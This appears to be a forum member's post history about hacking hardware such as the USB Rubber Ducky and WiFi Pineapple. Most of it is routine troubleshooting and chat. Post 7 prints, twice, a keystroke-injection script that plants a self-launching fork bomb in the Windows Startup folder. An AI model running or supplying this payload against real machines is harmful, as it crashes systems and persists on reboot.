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Posts posted by CanadianTaco

  1. I have a client who wants to give out a promotional USB stick at a media event. When customers insert it into their computer, he wants it to open their browser (if not already open), load a URL and insert a promo code into a field on the page.

    How close can I get to this functionality?

    There will be 100 guests and they are likely to have a variety of operating systems.

    It should all be completely possible.

    You should check out the USB Rubber Ducky: http://hakshop.myshopify.com/collections/frontpage/products/usb-rubber-ducky

  2. Im rockin one of the Acer I5 TimelineX laptops that I think Snubsie had in Season 9. Cobolt blue, I5 Cpu, W7x64. I dualboot to BT5R1 and I abolsolutely love this box. It was around $600 last Dec.

    ETA: everything worked straight out of the box, BT works flawlessly on install

    I'm in the market for a new laptop as well, and that series really interests me. How's the battery life on it?

  3. Hey guys I was wondering if someone can help me I just bought an acer Timelinex 5830tg it has an Intel wireless card and I wanted to know if I can purchase an Atheros wireless card and swap it out any help would be great thanks.

    Is an external USB wifi card out of the question? : ALFA USB WiFi AWUS036H from the hakshop works perfectly...

  4. Hi!

    I have tried to use 1 GiG micro SD card that i had . but the usb ducky didnt seem to recognize it! the LED was SOLID red.

    are there restrictions on thw Micro SD size?


    Chances are it's not the size of the SD card. It might not be inserted correctly. I plugged mine in once and it lit up red but after I re-adjusted the card and made sure the latch was closed completely it worked just fine.

  5. Well in the feature_request page of the wiki it states:

    2-second delay before executing any payloads – at which time 1, 2, or 3 button presses can indicate inject1.bin, inject2.bin or inject3.bin. No button press after the 2-second delay executes the default inject.bin. Four payloads on a single card!

    So you could manually inject whichever .bin file you want. But I'm still not sure on how you would go about automatically detecting a specific OS. Maybe have the first inject.bin do so, then based on that have the if statement redirect to whichever inject(1,2,3).bin would be required for that particular OS...

  6. This dosnt really help you but i figured i wohld post it anyways. Im having a custom case milled out of delrin to fit it. My duck just shipped today but as soon as i get it its go time. I have a few ideas on making the case water tight. I also may do one in a metal (titanium or CuTu) with a rubber lined interior. I dont know what im more excited about, the hardware or making cool stuff for it!

    Will you still have access to the micro SD card slot?

  7. So I ran the fork bomb on a windows 7 pc I had laying around and it worked perfectly, I had to boot up into safe mode to delete the "a.bat" file from startup. So I then restarted it and now the program won't work again. It gets caught up after running cmd as administrator when UAC pops up it doesn't press the left arrow to select yes.

    I've tried recompiling the code but still nothing...

    Using the code from: http://www.usbrubberducky.com/wiki/doku.php?id=payloads

    DELAY 200
    STRING cmd
    DELAY 200
    DELAY 100
    STRING a
    DELAY 200
    DELAY 1000
    STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
    STRING copy con a.bat
    STRING @echo off
    STRING start a.bat 
    STRING a.bat
    ALT F4

    Any ideas?


    For some reason this code works for me better than the previous code:

    DELAY 200
    STRING cmd
    DELAY 200
    DELAY 100
    STRING a
    DELAY 500
    DELAY 1000
    STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
    STRING copy con a.bat
    STRING @echo off
    STRING start a.bat 
    STRING a.bat
    ALT F4

    Which has got me thinking... What's the potential for running if statements with the duck. For example: Say you don't know what OS the target pc is running, so you create three different payloads (xp, Vista, 7) and then the if statement: if OS = 7 then run payload 3, and so on...???

  8. There was this game in middle school called "on your own" (I think...) You basically get a job, pay bills, and live day to day life. I just remember finding a plain text document somewhere in the program files and editing it to give me more money, and a higher score. Not sure if that really qualifies as a 'hack' but then again it was middle school...

  9. I have an interesting discovery, I don't know if it effects anything, but when i switch to whitelist, this shows in the log , kernel: KARMA: ssid ["anytest"] not found in whitelist so rejecting (that is my phone looking for anytest) so it seems to be at least partially working, however in blacklist nothing shows and my phone still acts as if it doesn't see anytest

    I haven't had a chance to look into the white||black lists just yet, maybe somebody else would have an answer for you.

  10. Thanks Darren for the pineapple! I got it in the mail today and I was looking over the auto rick roll guide and was thinking "I wanna do an auto Nyan cat" hmmmmm... shouldn't be to difficult :)

    Thanks again Darren.



    Created the Nyan Cat files (index.html, NYAN.mp3, NYAN.gif) tested it out, just copy these over instead of the Rick Roll files.

    -EDIT 2-

    Re-uploaded the NYAN.zip since the link was dead.

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